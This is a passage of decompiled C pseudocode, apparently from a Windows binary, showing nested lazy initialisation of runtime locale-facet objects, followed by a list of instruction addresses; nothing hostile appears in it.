																										E6D476A77(_t858 - 0x14);
																										return E6D490E67(_t806);
																									} else {
																										__eflags = _t826;
																										if(__eflags == 0) {
																											_push( *((intOrPtr*)(_t858 + 8)));
																											_push(_t858 - 0x10);
																											__eflags = E6D4825C5(_t606, _t658, _t797, _t806, _t826, __eflags, _t862) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D451940();
																												E6D4924F4(_t858 - 0x20, 0x6d5329cc);
																												asm("int3");
																												_push(0x14);
																												E6D490E9E(0x6d4fe9a2, _t606, _t806, _t826);
																												E6D476A10(_t858 - 0x14, 0);
																												_t827 =  *0x6d53fe08; // 0x0
																												 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																												 *(_t858 - 0x10) = _t827;
																												_t383 = E6D451D10();
																												_t665 =  *((intOrPtr*)(_t858 + 8));
																												_t807 = E6D452140( *((intOrPtr*)(_t858 + 8)), _t383);
																												__eflags = _t807;
																												if(_t807 != 0) {
																													L61:
																													E6D476A77(_t858 - 0x14);
																													return E6D490E67(_t807);
																												} else {
																													__eflags = _t827;
																													if(__eflags == 0) {
																														_push( *((intOrPtr*)(_t858 + 8)));
																														_push(_t858 - 0x10);
																														__eflags = E6D482649(_t606, _t665, _t797, _t807, _t827, __eflags, _t862) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D451940();
																															E6D4924F4(_t858 - 0x20, 0x6d5329cc);
																															asm("int3");
																															_push(0x14);
																															E6D490E9E(0x6d4fe9a2, _t606, _t807, _t827);
																															E6D476A10(_t858 - 0x14, 0);
																															_t828 =  *0x6d53fddc; // 0x0
																															 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																															 *(_t858 - 0x10) = _t828;
																															_t396 = E6D451D10();
																															_t672 =  *((intOrPtr*)(_t858 + 8));
																															_t808 = E6D452140( *((intOrPtr*)(_t858 + 8)), _t396);
																															__eflags = _t808;
																															if(_t808 != 0) {
																																L68:
																																E6D476A77(_t858 - 0x14);
																																return E6D490E67(_t808);
																															} else {
																																__eflags = _t828;
																																if(__eflags == 0) {
																																	_push( *((intOrPtr*)(_t858 + 8)));
																																	_push(_t858 - 0x10);
																																	__eflags = E6D4826CE(_t606, _t672, _t797, _t808, _t828, __eflags, _t862) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D451940();
																																		E6D4924F4(_t858 - 0x20, 0x6d5329cc);
																																		asm("int3");
																																		_push(0x14);
																																		E6D490E9E(0x6d4fe9a2, _t606, _t808, _t828);
																																		E6D476A10(_t858 - 0x14, 0);
																																		_t829 =  *0x6d53fdd8; // 0x0
																																		 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																		 *(_t858 - 0x10) = _t829;
																																		_t409 = E6D451D10();
																																		_t679 =  *((intOrPtr*)(_t858 + 8));
																																		_t809 = E6D452140( *((intOrPtr*)(_t858 + 8)), _t409);
																																		__eflags = _t809;
																																		if(_t809 != 0) {
																																			L75:
																																			E6D476A77(_t858 - 0x14);
																																			return E6D490E67(_t809);
																																		} else {
																																			__eflags = _t829;
																																			if(__eflags == 0) {
																																				_push( *((intOrPtr*)(_t858 + 8)));
																																				_push(_t858 - 0x10);
																																				__eflags = E6D482752(_t606, _t679, _t797, _t809, _t829, __eflags, _t862) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6D451940();
																																					E6D4924F4(_t858 - 0x20, 0x6d5329cc);
																																					asm("int3");
																																					_push(0x14);
																																					E6D490E9E(0x6d4fe9a2, _t606, _t809, _t829);
																																					E6D476A10(_t858 - 0x14, 0);
																																					_t830 =  *0x6d53fdec; // 0x0
																																					 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																					 *(_t858 - 0x10) = _t830;
																																					_t422 = E6D451D10();
																																					_t686 =  *((intOrPtr*)(_t858 + 8));
																																					_t810 = E6D452140( *((intOrPtr*)(_t858 + 8)), _t422);
																																					__eflags = _t810;
																																					if(_t810 != 0) {
																																						L82:
																																						E6D476A77(_t858 - 0x14);
																																						return E6D490E67(_t810);
																																					} else {
																																						__eflags = _t830;
																																						if(__eflags == 0) {
																																							_push( *((intOrPtr*)(_t858 + 8)));
																																							_push(_t858 - 0x10);
																																							__eflags = E6D4827D7(_t606, _t686, _t797, _t810, _t830, __eflags, _t862) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6D451940();
																																								E6D4924F4(_t858 - 0x20, 0x6d5329cc);
																																								asm("int3");
																																								_push(0x14);
																																								E6D490E9E(0x6d4fe9a2, _t606, _t810, _t830);
																																								E6D476A10(_t858 - 0x14, 0);
																																								_t831 =  *0x6d53fdc4; // 0x0
																																								 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																								 *(_t858 - 0x10) = _t831;
																																								_t435 = E6D451D10();
																																								_t693 =  *((intOrPtr*)(_t858 + 8));
																																								_t811 = E6D452140( *((intOrPtr*)(_t858 + 8)), _t435);
																																								__eflags = _t811;
																																								if(_t811 != 0) {
																																									L89:
																																									E6D476A77(_t858 - 0x14);
																																									return E6D490E67(_t811);
																																								} else {
																																									__eflags = _t831;
																																									if(__eflags == 0) {
																																										_push( *((intOrPtr*)(_t858 + 8)));
																																										_push(_t858 - 0x10);
																																										__eflags = E6D48283F(_t606, _t693, _t797, _t811, _t831, __eflags, _t862) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6D451940();
																																											E6D4924F4(_t858 - 0x20, 0x6d5329cc);
																																											asm("int3");
																																											_push(0x14);
																																											E6D490E9E(0x6d4fe9a2, _t606, _t811, _t831);
																																											E6D476A10(_t858 - 0x14, 0);
																																											_t832 =  *0x6d53fdf0; // 0x0
																																											 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																											 *(_t858 - 0x10) = _t832;
																																											_t448 = E6D451D10();
																																											_t700 =  *((intOrPtr*)(_t858 + 8));
																																											_t812 = E6D452140( *((intOrPtr*)(_t858 + 8)), _t448);
																																											__eflags = _t812;
																																											if(_t812 != 0) {
																																												L96:
																																												E6D476A77(_t858 - 0x14);
																																												return E6D490E67(_t812);
																																											} else {
																																												__eflags = _t832;
																																												if(__eflags == 0) {
																																													_push( *((intOrPtr*)(_t858 + 8)));
																																													_push(_t858 - 0x10);
																																													__eflags = E6D4828A7(_t606, _t700, _t797, _t812, _t832, __eflags, _t862) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6D451940();
																																														E6D4924F4(_t858 - 0x20, 0x6d5329cc);
																																														asm("int3");
																																														_push(0x14);
																																														E6D490E9E(0x6d4fe9a2, _t606, _t812, _t832);
																																														E6D476A10(_t858 - 0x14, 0);
																																														_t833 =  *0x6d53fdf4; // 0x0
																																														 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																														 *(_t858 - 0x10) = _t833;
																																														_t461 = E6D451D10();
																																														_t707 =  *((intOrPtr*)(_t858 + 8));
																																														_t813 = E6D452140( *((intOrPtr*)(_t858 + 8)), _t461);
																																														__eflags = _t813;
																																														if(_t813 != 0) {
																																															L103:
																																															E6D476A77(_t858 - 0x14);
																																															return E6D490E67(_t813);
																																														} else {
																																															__eflags = _t833;
																																															if(__eflags == 0) {
																																																_push( *((intOrPtr*)(_t858 + 8)));
																																																_push(_t858 - 0x10);
																																																__eflags = E6D48290F(_t606, _t707, _t797, _t813, _t833, __eflags, _t862) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6D451940();
																																																	E6D4924F4(_t858 - 0x20, 0x6d5329cc);
																																																	asm("int3");
																																																	_push(0x14);
																																																	E6D490E9E(0x6d4fe9a2, _t606, _t813, _t833);
																																																	E6D476A10(_t858 - 0x14, 0);
																																																	_t834 =  *0x6d53fe10; // 0x0
																																																	 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																	 *(_t858 - 0x10) = _t834;
																																																	_t474 = E6D451D10();
																																																	_t714 =  *((intOrPtr*)(_t858 + 8));
																																																	_t814 = E6D452140( *((intOrPtr*)(_t858 + 8)), _t474);
																																																	__eflags = _t814;
																																																	if(_t814 != 0) {
																																																		L110:
																																																		E6D476A77(_t858 - 0x14);
																																																		return E6D490E67(_t814);
																																																	} else {
																																																		__eflags = _t834;
																																																		if(__eflags == 0) {
																																																			_push( *((intOrPtr*)(_t858 + 8)));
																																																			_push(_t858 - 0x10);
																																																			__eflags = E6D48298A(_t606, _t714, _t797, _t814, _t834, __eflags, _t862) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6D451940();
																																																				E6D4924F4(_t858 - 0x20, 0x6d5329cc);
																																																				asm("int3");
																																																				_push(0x14);
																																																				E6D490E9E(0x6d4fe9a2, _t606, _t814, _t834);
																																																				E6D476A10(_t858 - 0x14, 0);
																																																				_t835 =  *0x6d53fde0; // 0x0
																																																				 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																				 *(_t858 - 0x10) = _t835;
																																																				_t487 = E6D451D10();
																																																				_t721 =  *((intOrPtr*)(_t858 + 8));
																																																				_t815 = E6D452140( *((intOrPtr*)(_t858 + 8)), _t487);
																																																				__eflags = _t815;
																																																				if(_t815 != 0) {
																																																					L117:
																																																					E6D476A77(_t858 - 0x14);
																																																					return E6D490E67(_t815);
																																																				} else {
																																																					__eflags = _t835;
																																																					if(__eflags == 0) {
																																																						_push( *((intOrPtr*)(_t858 + 8)));
																																																						_push(_t858 - 0x10);
																																																						__eflags = E6D4829F6(_t606, _t721, _t797, _t815, _t835, __eflags, _t862) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6D451940();
																																																							E6D4924F4(_t858 - 0x20, 0x6d5329cc);
																																																							asm("int3");
																																																							_push(0x14);
																																																							E6D490E9E(0x6d4fe9a2, _t606, _t815, _t835);
																																																							E6D476A10(_t858 - 0x14, 0);
																																																							_t836 =  *0x6d53fe14; // 0x0
																																																							 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																							 *(_t858 - 0x10) = _t836;
																																																							_t500 = E6D451D10();
																																																							_t728 =  *((intOrPtr*)(_t858 + 8));
																																																							_t816 = E6D452140( *((intOrPtr*)(_t858 + 8)), _t500);
																																																							__eflags = _t816;
																																																							if(_t816 != 0) {
																																																								L124:
																																																								E6D476A77(_t858 - 0x14);
																																																								return E6D490E67(_t816);
																																																							} else {
																																																								__eflags = _t836;
																																																								if(__eflags == 0) {
																																																									_push( *((intOrPtr*)(_t858 + 8)));
																																																									_push(_t858 - 0x10);
																																																									__eflags = E6D482A62(_t606, _t728, _t797, _t816, _t836, __eflags, _t862) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6D451940();
																																																										E6D4924F4(_t858 - 0x20, 0x6d5329cc);
																																																										asm("int3");
																																																										_push(0x14);
																																																										E6D490E9E(0x6d4fe9a2, _t606, _t816, _t836);
																																																										E6D476A10(_t858 - 0x14, 0);
																																																										_t837 =  *0x6d53fde4; // 0x0
																																																										 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																										 *(_t858 - 0x10) = _t837;
																																																										_t513 = E6D451D10();
																																																										_t735 =  *((intOrPtr*)(_t858 + 8));
																																																										_t817 = E6D452140( *((intOrPtr*)(_t858 + 8)), _t513);
																																																										__eflags = _t817;
																																																										if(_t817 != 0) {
																																																											L131:
																																																											E6D476A77(_t858 - 0x14);
																																																											return E6D490E67(_t817);
																																																										} else {
																																																											__eflags = _t837;
																																																											if(__eflags == 0) {
																																																												_push( *((intOrPtr*)(_t858 + 8)));
																																																												_push(_t858 - 0x10);
																																																												__eflags = E6D482AC8(_t606, _t735, _t797, _t817, _t837, __eflags, _t862) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													_t739 = _t858 - 0x20;
																																																													E6D451940();
																																																													E6D4924F4(_t858 - 0x20, 0x6d5329cc);
																																																													asm("int3");
																																																													_push(4);
																																																													E6D490E9E(0x6d4fefbc, _t606, _t817, _t837);
																																																													_t838 = _t739;
																																																													 *(_t858 - 0x10) = _t838;
																																																													 *((intOrPtr*)(_t838 + 4)) =  *((intOrPtr*)(_t858 + 0xc));
																																																													_push( *((intOrPtr*)(_t858 + 0x14)));
																																																													_push( *((intOrPtr*)(_t858 + 8)));
																																																													_t273 = _t858 - 4;
																																																													 *_t273 =  *(_t858 - 4) & 0x00000000;
																																																													__eflags =  *_t273;
																																																													 *_t838 = 0x6d5041ac;
																																																													 *((char*)(_t838 + 0x28)) =  *((intOrPtr*)(_t858 + 0x10));
																																																													E6D4868B7(_t606, _t739, _t797, _t817, _t838,  *_t273, _t862);
																																																													return E6D490E67(_t838);
																																																												} else {
																																																													_t817 =  *(_t858 - 0x10);
																																																													 *(_t858 - 0x10) = _t817;
																																																													 *(_t858 - 4) = 1;
																																																													E6D478A0B(__eflags, _t817);
																																																													 *0x6d5001e8();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t817 + 4))))();
																																																													 *0x6d53fde4 = _t817;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t817 = _t837;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t816 =  *(_t858 - 0x10);
																																																										 *(_t858 - 0x10) = _t816;
																																																										 *(_t858 - 4) = 1;
																																																										E6D478A0B(__eflags, _t816);
																																																										 *0x6d5001e8();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t816 + 4))))();
																																																										 *0x6d53fe14 = _t816;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t816 = _t836;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t815 =  *(_t858 - 0x10);
																																																							 *(_t858 - 0x10) = _t815;
																																																							 *(_t858 - 4) = 1;
																																																							E6D478A0B(__eflags, _t815);
																																																							 *0x6d5001e8();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t815 + 4))))();
																																																							 *0x6d53fde0 = _t815;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t815 = _t835;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t814 =  *(_t858 - 0x10);
																																																				 *(_t858 - 0x10) = _t814;
																																																				 *(_t858 - 4) = 1;
																																																				E6D478A0B(__eflags, _t814);
																																																				 *0x6d5001e8();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t814 + 4))))();
																																																				 *0x6d53fe10 = _t814;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t814 = _t834;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t813 =  *(_t858 - 0x10);
																																																	 *(_t858 - 0x10) = _t813;
																																																	 *(_t858 - 4) = 1;
																																																	E6D478A0B(__eflags, _t813);
																																																	 *0x6d5001e8();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t813 + 4))))();
																																																	 *0x6d53fdf4 = _t813;
																																																	goto L103;
																																																}
																																															} else {
																																																_t813 = _t833;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t812 =  *(_t858 - 0x10);
																																														 *(_t858 - 0x10) = _t812;
																																														 *(_t858 - 4) = 1;
																																														E6D478A0B(__eflags, _t812);
																																														 *0x6d5001e8();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t812 + 4))))();
																																														 *0x6d53fdf0 = _t812;
																																														goto L96;
																																													}
																																												} else {
																																													_t812 = _t832;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t811 =  *(_t858 - 0x10);
																																											 *(_t858 - 0x10) = _t811;
																																											 *(_t858 - 4) = 1;
																																											E6D478A0B(__eflags, _t811);
																																											 *0x6d5001e8();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t811 + 4))))();
																																											 *0x6d53fdc4 = _t811;
																																											goto L89;
																																										}
																																									} else {
																																										_t811 = _t831;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t810 =  *(_t858 - 0x10);
																																								 *(_t858 - 0x10) = _t810;
																																								 *(_t858 - 4) = 1;
																																								E6D478A0B(__eflags, _t810);
																																								 *0x6d5001e8();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t810 + 4))))();
																																								 *0x6d53fdec = _t810;
																																								goto L82;
																																							}
																																						} else {
																																							_t810 = _t830;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t809 =  *(_t858 - 0x10);
																																					 *(_t858 - 0x10) = _t809;
																																					 *(_t858 - 4) = 1;
																																					E6D478A0B(__eflags, _t809);
																																					 *0x6d5001e8();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t809 + 4))))();
																																					 *0x6d53fdd8 = _t809;
																																					goto L75;
																																				}
																																			} else {
																																				_t809 = _t829;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t808 =  *(_t858 - 0x10);
																																		 *(_t858 - 0x10) = _t808;
																																		 *(_t858 - 4) = 1;
																																		E6D478A0B(__eflags, _t808);
																																		 *0x6d5001e8();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t808 + 4))))();
																																		 *0x6d53fddc = _t808;
																																		goto L68;
																																	}
																																} else {
																																	_t808 = _t828;
																																	goto L68;
																																}
																															}
																														} else {
																															_t807 =  *(_t858 - 0x10);
																															 *(_t858 - 0x10) = _t807;
																															 *(_t858 - 4) = 1;
																															E6D478A0B(__eflags, _t807);
																															 *0x6d5001e8();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t807 + 4))))();
																															 *0x6d53fe08 = _t807;
																															goto L61;
																														}
																													} else {
																														_t807 = _t827;
																														goto L61;
																													}
																												}
																											} else {
																												_t806 =  *(_t858 - 0x10);
																												 *(_t858 - 0x10) = _t806;
																												 *(_t858 - 4) = 1;
																												E6D478A0B(__eflags, _t806);
																												 *0x6d5001e8();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t806 + 4))))();
																												 *0x6d53fe0c = _t806;
																												goto L54;
																											}
																										} else {
																											_t806 = _t826;
																											goto L54;
																										}
																									}
																								} else {
																									_t805 =  *(_t858 - 0x10);
																									 *(_t858 - 0x10) = _t805;
																									 *(_t858 - 4) = 1;
																									E6D478A0B(__eflags, _t805);
																									 *0x6d5001e8();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t805 + 4))))();
																									 *0x6d53fdd4 = _t805;
																									goto L47;
																								}
																							} else {
																								_t805 = _t825;
																								goto L47;
																							}
																						}
																					} else {
																						_t804 =  *(_t858 - 0x10);
																						 *(_t858 - 0x10) = _t804;
																						 *(_t858 - 4) = 1;
																						E6D478A0B(__eflags, _t804);
																						 *0x6d5001e8();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t804 + 4))))();
																						 *0x6d53fe04 = _t804;
																						goto L40;
																					}
																				} else {
																					_t804 = _t824;
																					goto L40;
																				}
																			}
																		} else {
																			_t803 =  *(_t858 - 0x10);
																			 *(_t858 - 0x10) = _t803;
																			 *(_t858 - 4) = 1;
																			E6D478A0B(__eflags, _t803);
																			 *0x6d5001e8();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t803 + 4))))();
																			 *0x6d53fdd0 = _t803;
																			goto L33;
																		}
																	} else {
																		_t803 = _t823;
																		goto L33;
																	}
																}
															} else {
																_t802 =  *(_t858 - 0x10);
																 *(_t858 - 0x10) = _t802;
																 *(_t858 - 4) = 1;
																E6D478A0B(__eflags, _t802);
																 *0x6d5001e8();
																 *((intOrPtr*)( *((intOrPtr*)( *_t802 + 4))))();
																 *0x6d53fe00 = _t802;
																goto L26;
															}
														} else {
															_t802 = _t822;
															goto L26;
														}
													}
												} else {
													_t801 =  *(_t858 - 0x10);
													 *(_t858 - 0x10) = _t801;
													 *(_t858 - 4) = 1;
													E6D478A0B(__eflags, _t801);
													 *0x6d5001e8();
													 *((intOrPtr*)( *((intOrPtr*)( *_t801 + 4))))();
													 *0x6d53fdcc = _t801;
													goto L19;
												}
											} else {
												_t801 = _t821;
												goto L19;
											}
										}
									} else {
										_t800 =  *(_t858 - 0x10);
										 *(_t858 - 0x10) = _t800;
										 *(_t858 - 4) = 1;
										E6D478A0B(__eflags, _t800);
										 *0x6d5001e8();
										 *((intOrPtr*)( *((intOrPtr*)( *_t800 + 4))))();
										 *0x6d53fdfc = _t800;
										goto L12;
									}
								} else {
									_t800 = _t820;
									goto L12;
								}
							}
						} else {
							_t799 =  *(_t858 - 0x10);
							 *(_t858 - 0x10) = _t799;
							 *(_t858 - 4) = 1;
							E6D478A0B(__eflags, _t799);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t799 + 4))))();
							 *0x6d53fde8 = _t799;
							goto L5;
						}
					} else {
						_t799 = _t819;
						goto L5;
					}
				}
			}

0x6d48056c
0x6d48056c
0x6d48056c
0x6d480573
0x6d48057d
0x6d480582
0x6d48058d
0x6d480591
0x6d480594
0x6d480599
0x6d48059d
0x6d4805a2
0x6d4805a6
0x6d4805eb
0x6d4805ee
0x6d4805fa
0x6d4805a8
0x6d4805aa
0x6d4805b0
0x6d4805b6
0x6d4805be
0x6d4805c1
0x6d4805fe
0x6d48060c
0x6d480611
0x6d480612
0x6d480619
0x6d480623
0x6d480628
0x6d480633
0x6d480637
0x6d48063a
0x6d48063f
0x6d480648
0x6d48064a
0x6d48064c
0x6d480691
0x6d480694
0x6d4806a0
0x6d48064e
0x6d48064e
0x6d480650
0x6d480656
0x6d48065c
0x6d480664
0x6d480667
0x6d4806a4
0x6d4806b2
0x6d4806b7
0x6d4806b8
0x6d4806bf
0x6d4806c9
0x6d4806ce
0x6d4806d9
0x6d4806dd
0x6d4806e0
0x6d4806e5
0x6d4806ee
0x6d4806f0
0x6d4806f2
0x6d480737
0x6d48073a
0x6d480746
0x6d4806f4
0x6d4806f4
0x6d4806f6
0x6d4806fc
0x6d480702
0x6d48070a
0x6d48070d
0x6d48074a
0x6d480758
0x6d48075d
0x6d48075e
0x6d480765
0x6d48076f
0x6d480774
0x6d48077f
0x6d480783
0x6d480786
0x6d48078b
0x6d480794
0x6d480796
0x6d480798
0x6d4807dd
0x6d4807e0
0x6d4807ec
0x6d48079a
0x6d48079a
0x6d48079c
0x6d4807a2
0x6d4807a8
0x6d4807b0
0x6d4807b3
0x6d4807f0
0x6d4807fe
0x6d480803
0x6d480804
0x6d48080b
0x6d480815
0x6d48081a
0x6d480825
0x6d480829
0x6d48082c
0x6d480831
0x6d48083a
0x6d48083c
0x6d48083e
0x6d480883
0x6d480886
0x6d480892
0x6d480840
0x6d480840
0x6d480842
0x6d480848
0x6d48084e
0x6d480856
0x6d480859
0x6d480896
0x6d4808a4
0x6d4808a9
0x6d4808aa
0x6d4808b1
0x6d4808bb
0x6d4808c0
0x6d4808cb
0x6d4808cf
0x6d4808d2
0x6d4808d7
0x6d4808e0
0x6d4808e2
0x6d4808e4
0x6d480929
0x6d48092c
0x6d480938
0x6d4808e6
0x6d4808e6
0x6d4808e8
0x6d4808ee
0x6d4808f4
0x6d4808fc
0x6d4808ff
0x6d48093c
0x6d48094a
0x6d48094f
0x6d480950
0x6d480957
0x6d480961
0x6d480966
0x6d480971
0x6d480975
0x6d480978
0x6d48097d
0x6d480986
0x6d480988
0x6d48098a
0x6d4809cf
0x6d4809d2
0x6d4809de
0x6d48098c
0x6d48098c
0x6d48098e
0x6d480994
0x6d48099a
0x6d4809a2
0x6d4809a5
0x6d4809e2
0x6d4809f0
0x6d4809f5
0x6d4809f6
0x6d4809fd
0x6d480a07
0x6d480a0c
0x6d480a17
0x6d480a1b
0x6d480a1e
0x6d480a23
0x6d480a2c
0x6d480a2e
0x6d480a30
0x6d480a75
0x6d480a78
0x6d480a84
0x6d480a32
0x6d480a32
0x6d480a34
0x6d480a3a
0x6d480a40
0x6d480a48
0x6d480a4b
0x6d480a88
0x6d480a96
0x6d480a9b
0x6d480a9c
0x6d480aa3
0x6d480aad
0x6d480ab2
0x6d480abd
0x6d480ac1
0x6d480ac4
0x6d480ac9
0x6d480ad2
0x6d480ad4
0x6d480ad6
0x6d480b1b
0x6d480b1e
0x6d480b2a
0x6d480ad8
0x6d480ad8
0x6d480ada
0x6d480ae0
0x6d480ae6
0x6d480aee
0x6d480af1
0x6d480b2e
0x6d480b3c
0x6d480b41
0x6d480b42
0x6d480b49
0x6d480b53
0x6d480b58
0x6d480b63
0x6d480b67
0x6d480b6a
0x6d480b6f
0x6d480b78
0x6d480b7a
0x6d480b7c
0x6d480bc1
0x6d480bc4
0x6d480bd0
0x6d480b7e
0x6d480b7e
0x6d480b80
0x6d480b86
0x6d480b8c
0x6d480b94
0x6d480b97
0x6d480bd4
0x6d480be2
0x6d480be7
0x6d480be8
0x6d480bef
0x6d480bf9
0x6d480bfe
0x6d480c09
0x6d480c0d
0x6d480c10
0x6d480c15
0x6d480c1e
0x6d480c20
0x6d480c22
0x6d480c67
0x6d480c6a
0x6d480c76
0x6d480c24
0x6d480c24
0x6d480c26
0x6d480c2c
0x6d480c32
0x6d480c3a
0x6d480c3d
0x6d480c7a
0x6d480c88
0x6d480c8d
0x6d480c8e
0x6d480c95
0x6d480c9f
0x6d480ca4
0x6d480caf
0x6d480cb3
0x6d480cb6
0x6d480cbb
0x6d480cc4
0x6d480cc6
0x6d480cc8
0x6d480d0d
0x6d480d10
0x6d480d1c
0x6d480cca
0x6d480cca
0x6d480ccc
0x6d480cd2
0x6d480cd8
0x6d480ce0
0x6d480ce3
0x6d480d20
0x6d480d2e
0x6d480d33
0x6d480d34
0x6d480d3b
0x6d480d45
0x6d480d4a
0x6d480d55
0x6d480d59
0x6d480d5c
0x6d480d61
0x6d480d6a
0x6d480d6c
0x6d480d6e
0x6d480db3
0x6d480db6
0x6d480dc2
0x6d480d70
0x6d480d70
0x6d480d72
0x6d480d78
0x6d480d7e
0x6d480d86
0x6d480d89
0x6d480dc6
0x6d480dd4
0x6d480dd9
0x6d480dda
0x6d480de1
0x6d480deb
0x6d480df0
0x6d480dfb
0x6d480dff
0x6d480e02
0x6d480e07
0x6d480e10
0x6d480e12
0x6d480e14
0x6d480e59
0x6d480e5c
0x6d480e68
0x6d480e16
0x6d480e16
0x6d480e18
0x6d480e1e
0x6d480e24
0x6d480e2c
0x6d480e2f
0x6d480e6c
0x6d480e7a
0x6d480e7f
0x6d480e80
0x6d480e87
0x6d480e91
0x6d480e96
0x6d480ea1
0x6d480ea5
0x6d480ea8
0x6d480ead
0x6d480eb6
0x6d480eb8
0x6d480eba
0x6d480eff
0x6d480f02
0x6d480f0e
0x6d480ebc
0x6d480ebc
0x6d480ebe
0x6d480ec4
0x6d480eca
0x6d480ed2
0x6d480ed5
0x6d480f12
0x6d480f20
0x6d480f25
0x6d480f26
0x6d480f2d
0x6d480f37
0x6d480f3c
0x6d480f47
0x6d480f4b
0x6d480f4e
0x6d480f53
0x6d480f5c
0x6d480f5e
0x6d480f60
0x6d480fa5
0x6d480fa8
0x6d480fb4
0x6d480f62
0x6d480f62
0x6d480f64
0x6d480f6a
0x6d480f70
0x6d480f78
0x6d480f7b
0x6d480fb8
0x6d480fc6
0x6d480fcb
0x6d480fcc
0x6d480fd3
0x6d480fdd
0x6d480fe2
0x6d480fed
0x6d480ff1
0x6d480ff4
0x6d480ff9
0x6d481002
0x6d481004
0x6d481006
0x6d48104b
0x6d48104e
0x6d48105a
0x6d481008
0x6d481008
0x6d48100a
0x6d481010
0x6d481016
0x6d48101e
0x6d481021
0x6d48105e
0x6d48106c
0x6d481071
0x6d481072
0x6d481079
0x6d481083
0x6d481088
0x6d481093
0x6d481097
0x6d48109a
0x6d48109f
0x6d4810a8
0x6d4810aa
0x6d4810ac
0x6d4810f1
0x6d4810f4
0x6d481100
0x6d4810ae
0x6d4810ae
0x6d4810b0
0x6d4810b6
0x6d4810bc
0x6d4810c4
0x6d4810c7
0x6d481104
0x6d481112
0x6d481117
0x6d481118
0x6d48111f
0x6d481129
0x6d48112e
0x6d481139
0x6d48113d
0x6d481140
0x6d481145
0x6d48114e
0x6d481150
0x6d481152
0x6d481197
0x6d48119a
0x6d4811a6
0x6d481154
0x6d481154
0x6d481156
0x6d48115c
0x6d481162
0x6d48116a
0x6d48116d
0x6d4811a7
0x6d4811aa
0x6d4811b8
0x6d4811bd
0x6d4811be
0x6d4811c5
0x6d4811ca
0x6d4811cc
0x6d4811d2
0x6d4811d5
0x6d4811db
0x6d4811de
0x6d4811de
0x6d4811de
0x6d4811e2
0x6d4811e8
0x6d4811eb
0x6d4811f7
0x6d48116f
0x6d48116f
0x6d481172
0x6d481176
0x6d48117a
0x6d481187
0x6d48118f
0x6d481191
0x00000000
0x6d481191
0x6d481158
0x6d481158
0x00000000
0x6d481158
0x6d481156
0x6d4810c9
0x6d4810c9
0x6d4810cc
0x6d4810d0
0x6d4810d4
0x6d4810e1
0x6d4810e9
0x6d4810eb
0x00000000
0x6d4810eb
0x6d4810b2
0x6d4810b2
0x00000000
0x6d4810b2
0x6d4810b0
0x6d481023
0x6d481023
0x6d481026
0x6d48102a
0x6d48102e
0x6d48103b
0x6d481043
0x6d481045
0x00000000
0x6d481045
0x6d48100c
0x6d48100c
0x00000000
0x6d48100c
0x6d48100a
0x6d480f7d
0x6d480f7d
0x6d480f80
0x6d480f84
0x6d480f88
0x6d480f95
0x6d480f9d
0x6d480f9f
0x00000000
0x6d480f9f
0x6d480f66
0x6d480f66
0x00000000
0x6d480f66
0x6d480f64
0x6d480ed7
0x6d480ed7
0x6d480eda
0x6d480ede
0x6d480ee2
0x6d480eef
0x6d480ef7
0x6d480ef9
0x00000000
0x6d480ef9
0x6d480ec0
0x6d480ec0
0x00000000
0x6d480ec0
0x6d480ebe
0x6d480e31
0x6d480e31
0x6d480e34
0x6d480e38
0x6d480e3c
0x6d480e49
0x6d480e51
0x6d480e53
0x00000000
0x6d480e53
0x6d480e1a
0x6d480e1a
0x00000000
0x6d480e1a
0x6d480e18
0x6d480d8b
0x6d480d8b
0x6d480d8e
0x6d480d92
0x6d480d96
0x6d480da3
0x6d480dab
0x6d480dad
0x00000000
0x6d480dad
0x6d480d74
0x6d480d74
0x00000000
